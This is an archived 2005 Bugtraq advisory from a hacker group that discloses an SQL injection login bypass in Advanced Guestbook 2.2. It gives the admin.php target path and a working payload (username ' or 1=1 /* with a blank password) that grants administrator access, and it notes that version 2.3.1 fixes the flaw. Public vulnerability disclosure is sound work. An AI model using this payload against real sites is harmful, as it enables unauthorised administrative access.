[41082] in bugtraq

home help back first fref pref prev next nref lref last post

Advanced Guestbook 2.2 ( SQL Injection Exploit )

daemon@ATHENA.MIT.EDU (bhs_team@yahoo.com)
Mon Nov 7 19:22:30 2005

Date: 6 Nov 2005 19:03:12 -0000
Message-ID: <20051106190312.24566.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: bhs_team@yahoo.com
To: bugtraq@securityfocus.com

Guestbook 2.2 webapplication (PHP, MySQL) appears vulnerable to SQL Injection granting the attacker administrator access.

Target : 

http://www.example.com/[GuestbookTarget]/admin.php

Username: ' or 1=1 /*
Password: (Nothing)(Blank)


It`s Working On Advanced Guestbook 2.2 version 2.3.1 will fix this vulnerability. 

Report By : POPO ( Pooya )
From www.Babol-Hackers.com
bhs_team@yahoo.com
Y! ID : bhs_team , pooya_0nline
-----------------------------------
BHS-Team

We Are : POPO + Padeshah  + Black ICE + Ezraeil + UNDERTAKER + Fa0p

home help back first fref pref prev next nref lref last post